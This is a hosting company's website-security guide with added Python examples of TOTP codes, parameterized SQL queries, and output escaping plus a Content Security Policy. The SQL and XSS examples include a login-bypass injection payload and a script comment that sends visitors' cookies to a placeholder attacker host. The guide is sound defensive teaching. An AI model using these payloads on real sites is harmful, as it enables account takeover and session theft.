Thousands of websites are hacked every day. According to Symantec research, three-quarters of websites on the internet today contain vulnerabilities. Those vulnerabilities can be exploited by attackers for their own ends. Some redirect traffic from compromised websites to other malicious platforms, while others focus on stealing customer or business information in order to profit from it.
It is also very common for attackers to plant malicious code on sites to spread spam and malware to unsuspecting internet users, and to carry out a long list of cyber-crimes from compromised websites without the site owners' knowledge. An attacker may be able to infiltrate your server without you ever knowing. By the time you do realise it, it may be too late, and you will have lost a great deal of credibility and money. Here are important steps you should take to keep your website safe from cyber attacks.
Just as you run endpoint protection software on your business computers, your website needs additional security software to keep attackers at bay. Preventive measures begin with installing and configuring security software on your website. Some of this software monitors the traffic coming into your website every day to detect and block potential attacks. Other tools disable known methods of revealing sensitive site information, such as user enumeration and the admin login URI. This frustrates automated attacks carried out by bots that scan for websites of a specific build.
Keep the spam detector on your CMS up and running so that your comments section is not inundated with links to malicious sites. As an added layer, mask your website's CMS identity (version strings, generator meta tags, default paths) to hide from automated malware that seeks websites with a specific build. Bear in mind that this only raises the cost for untargeted scanners; a determined human attacker can still fingerprint the site, so masking complements patching and never replaces it.
Also, tighten access control for all users of your website. Give staff only the level of access needed to perform their function (the principle of least privilege), and limit full admin functions to the few people who actually administer the site. Make logged-in sessions expire after short periods of inactivity to reduce the window in which a hijacked or unattended session can be abused.
Most websites today are built with content management systems (CMS) like WordPress and Joomla. If your website was built with a CMS, update it regularly, and update the plugins and modules that extend your core site software as soon as updates become available. Many updates fix newly discovered vulnerabilities, and the release notes often describe exactly what was fixed. Delaying updates means your site continues to harbour vulnerabilities that are already public, and attackers routinely scan for sites that have not yet patched them.
12345678 is not a good password. Neither is your birthday or your grandmother's maiden name. Passwords are the keys to the back-end of your website; if an attacker can guess your password, they can tamper with your website, steal information or wipe out all your data. Use a long, unique password for every account. If you can't come up with one on your own, a password manager can generate and store one for you; prefer a manager or an offline generator to typing your future password into an arbitrary website.
In addition, implement two-factor authentication (2FA). 2FA requires a second confirmation step before logging you into your website. When activated, you receive authorisation codes from an authenticator app, by SMS or by email to complete and confirm the login process. So even if outsiders are able to guess your password, they would still need the authorisation code to get in, which tilts the odds in your favour. An authenticator app or hardware key is stronger than SMS or email, since those channels can be intercepted or phished. 2FA may also serve as an alarm bell: if you receive a code you did not ask for, someone has your password, and you should change it straight away.
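To make the "authorisation code" concrete, here is how the codes produced by an authenticator app are generated and checked. This is an added example written for this article, not code from Gesatech or from any CMS; it implements HOTP (RFC 4226) and TOTP (RFC 6238) with the standard library only, and the shared secret is the RFC 6238 reference secret, used here purely as a constructed example.

```python
"""Added example: generating and verifying the one-time codes behind app-based 2FA.
HOTP per RFC 4226, TOTP per RFC 6238 (SHA-1, the variant authenticator apps use)."""
import hashlib
import hmac
import struct
import time

# RFC 6238 reference secret (ASCII "12345678901234567890"); a constructed example,
# not a real key. In production the secret is random, per user, and stored encrypted.
SHARED_SECRET = b"12345678901234567890"
TIME_STEP = 30   # seconds per code; the common default
DIGITS = 6


def hotp(secret: bytes, counter: int, digits: int = DIGITS) -> str:
    """HMAC-based one-time password (RFC 4226) for a given counter value."""
    msg = struct.pack(">Q", counter)                       # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                             # dynamic truncation offset
    code_int = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code_int % (10 ** digits)).zfill(digits)


def totp(secret: bytes, at_time: int, digits: int = DIGITS, step: int = TIME_STEP) -> str:
    """Time-based one-time password (RFC 6238): HOTP with counter = floor(t / step)."""
    return hotp(secret, at_time // step, digits)


def verify_totp(secret: bytes, submitted: str, at_time: int, window: int = 1) -> bool:
    """Accept the code for the current step and `window` steps either side, to tolerate
    clock drift between phone and server. Comparison is constant-time so response
    timing does not leak which digits matched."""
    counter = at_time // TIME_STEP
    return any(
        hmac.compare_digest(hotp(secret, counter + delta), submitted)
        for delta in range(-window, window + 1)
    )


if __name__ == "__main__":
    now = int(time.time())
    code = totp(SHARED_SECRET, now)
    print("current code:", code, "verifies:", verify_totp(SHARED_SECRET, code, now))
```

Two things the snippet does not do that a real login flow must: record the counter of the last accepted code so the same code cannot be replayed within its window, and rate-limit verification attempts, since a six-digit code with a three-step window is guessable by brute force otherwise.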
A web application firewall (WAF) filters the HTTP traffic coming to a web application to detect cross-site request forgery, cross-site scripting, file inclusion, SQL injection and similar attacks. It serves as a gateway to your website, and when it detects abnormal requests it shields the targeted web application from them. A WAF should be deployed as one layer among a wide range of security controls to keep your business assets safe from malware and attackers; it reduces exposure but does not fix the underlying vulnerability in your code. Gesatech Hosting Services includes a WAF by default on all web hosting accounts. It is extremely helpful to keep the protection on.
You should also keep your site's admin pages out of search engine indexes, for instance with a Disallow rule in the robots.txt file. If they are indexed, attackers can find them with a simple search query. Note, however, that robots.txt is publicly readable and only asks well-behaved crawlers to stay away; attackers read it precisely to discover paths such as your admin panel. Treat it as a courtesy to search engines, not as access control: protect admin pages with authentication, and where practical restrict them to known IP addresses or a VPN.
HTTP is how information is transferred over the internet. HTTPS is the secured and encrypted version of that transfer. Secure transfer is achieved by installing an SSL/TLS certificate on the website and serving the site over HTTPS, which browsers indicate with a padlock (green in older browsers) and HTTPS preceding the site URL in the address bar. Without TLS, attackers who can sniff network traffic (for example on a shared Wi-Fi network) may be able to read or alter information in transit between site users' browsers and the web servers hosting the website.
Internet users have come to associate the padlock in their browsers with secure information transfer. If your website accepts customer information in any form, you have an obligation to install an SSL/TLS certificate on your site to protect your customers' data in transit; free certificates from Let's Encrypt make this inexpensive.
If you have a web form on your website that feeds a database query, use parameterized queries to prevent SQL injection. A parameterized query sends the SQL statement and the user-supplied values to the database separately, substituting a placeholder for each value, so the input can never be interpreted as part of the SQL. Without this, attackers can read and tamper with your database in ways that will wreak havoc on your business.
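The difference is easiest to see with a login lookup written both ways. The following is an added example for this article, not code from Gesatech or from any CMS; it runs against an in-memory SQLite table constructed here for the demonstration, and the stored credential is a placeholder string standing in for a real password hash.

```python
"""Added example: the same database lookup built by string concatenation (injectable)
and with placeholders (parameterized). Uses the standard-library sqlite3 driver; the
same pattern applies to MySQL/PostgreSQL drivers and PHP's PDO prepared statements."""
import sqlite3

# Constructed sample data: one admin account. 'hashed-secret' stands in for a real
# password hash; a production login would hash the submitted password before lookup.
SAMPLE_ROWS = [("admin", "hashed-secret")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    """Builds the SQL text from user input: the classic injection bug."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username
           + "' AND password_hash = '" + password_hash + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    """Same lookup with placeholders: the driver sends the values separately from the
    statement, so a quote or comment marker in the input is just data."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(sql, (username, password_hash)).fetchone()[0] > 0


# Textbook payload: closes the string literal and comments out the password check,
# turning the query into  ... WHERE username = 'admin' --' AND password_hash = '...'
INJECTION = "admin' --"


def demo() -> dict:
    conn = make_db()
    wrong_hash = "not-the-real-hash"
    return {
        "vulnerable_bypassed": login_vulnerable(conn, INJECTION, wrong_hash),
        "safe_rejects_payload": not login_safe(conn, INJECTION, wrong_hash),
        "safe_accepts_real_login": login_safe(conn, "admin", "hashed-secret"),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

With the concatenated query the attacker logs in as admin without knowing the password; with placeholders the same payload is looked up as a literal username that does not exist. Parameterization protects the values only; table and column names cannot be parameterized and must come from a fixed allowlist in your code.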
Comment injection attacks have become rampant. The comment section of your website should validate and, above all, escape submitted content before it is rendered, so that rogue code never runs in your visitors' browsers. Without this, attackers enter malicious JavaScript into your comments section, and it executes in the browser of every visitor who loads the page (stored cross-site scripting); from there they can steal sessions, including an administrator's, and take control of the website. Escape output as HTML, and as a second layer use a Content Security Policy header to limit which scripts may run on your web pages.
It is also helpful to implement a captcha on all web forms on your website, including comment, login and registration forms. Captchas are small challenges designed to distinguish humans from bots by asking the user to answer an unpredictable question that is simple for a human but hard for a bot. A captcha limits bots submitting information through your website's forms, but it does not stop a human attacker, so pair it with rate limiting and account lockout on login forms.
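To show what the escaping and the Content Security Policy in the comment-injection paragraph above actually do, here is an added example written for this article (not code from Gesatech or from any CMS). The comment payload and page template are constructed for the demonstration, and the small CSP check is a simplified reading of the header, not a browser's full policy engine.

```python
"""Added example: a stored-XSS comment rendered unescaped and escaped, plus a check of
whether a Content-Security-Policy header would let an injected <script> block run."""
import html
import re

# Constructed malicious comment of the kind described in the article: it would ship
# every visitor's cookies to an attacker-controlled host (evil.example is a placeholder).
MALICIOUS_COMMENT = (
    '<script>fetch("https://evil.example/steal?c=" + document.cookie)</script>'
)

TEMPLATE = '<div class="comment">{body}</div>'


def render_unsafe(comment: str) -> str:
    """Drops the raw comment into the page: the <script> tag becomes live HTML."""
    return TEMPLATE.format(body=comment)


def render_safe(comment: str) -> str:
    """Escapes <, >, &, ' and " so the browser displays the text instead of running it."""
    return TEMPLATE.format(body=html.escape(comment, quote=True))


_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_live_script(page: str) -> bool:
    """Crude marker used only to contrast the two renders above."""
    return bool(_SCRIPT_TAG.search(page))


def script_sources(policy: str) -> list:
    """Return the source list governing scripts: script-src if set, else default-src."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives.get("script-src", directives.get("default-src", []))


def allows_inline_script(policy: str) -> bool:
    """True when an injected inline <script> would execute under this header.
    No directive means no restriction; 'unsafe-inline' permits it unless a nonce or
    hash source is also present, in which case modern browsers ignore 'unsafe-inline'."""
    sources = script_sources(policy)
    if not sources:
        return True
    has_nonce_or_hash = any(s.startswith(("'nonce-", "'sha")) for s in sources)
    return "'unsafe-inline'" in sources and not has_nonce_or_hash


# The weak setting beside the corrected one.
WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline'"
STRICT_CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'"

if __name__ == "__main__":
    print("unsafe render runs script:", contains_live_script(render_unsafe(MALICIOUS_COMMENT)))
    print("safe render runs script:  ", contains_live_script(render_safe(MALICIOUS_COMMENT)))
    print("weak CSP allows inline:   ", allows_inline_script(WEAK_CSP))
    print("strict CSP allows inline: ", allows_inline_script(STRICT_CSP))
```

Escaping on output is the primary defence; the CSP is a backstop for the script you did not expect, and it only helps if your own pages avoid inline scripts (or tag them with a nonce), which is why the strict policy above omits 'unsafe-inline'.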
Securing your business website starts with choosing the right hosting provider. Whether it is a self-hosted server or a managed hosting service, make sure you understand the privileges you have and which layers (operating system, web server, database, application) you are responsible for securing. Even when the host provides excellent security, deploy plugins/modules and follow best practices to complement their efforts; a secured server doesn't necessarily translate into a secured website.
Regardless of your best efforts, things can sometimes go wrong. Even tech giants like Facebook have had security breaches. The best way to ensure your business doesn't suffer long downtime is to carry out routine backups. Some hosting services, like Gesatech Hosting, offer free complimentary backups. Others offer backup options at additional cost. Check with your hosting provider to find out what is available to you. If backups are not included in your service, run a regular backup and store the files on a different server or external drive, so that an attacker who compromises the web server cannot also delete the backups. Test a restore periodically; a backup you have never restored is only a hope. With a tested backup on hand, you will be up and running in no time in the event of an attack.
Your website is arguably your most important marketing tool; don’t let it fall into the wrong hands.
Copyright 2017 © Gesatech Solutions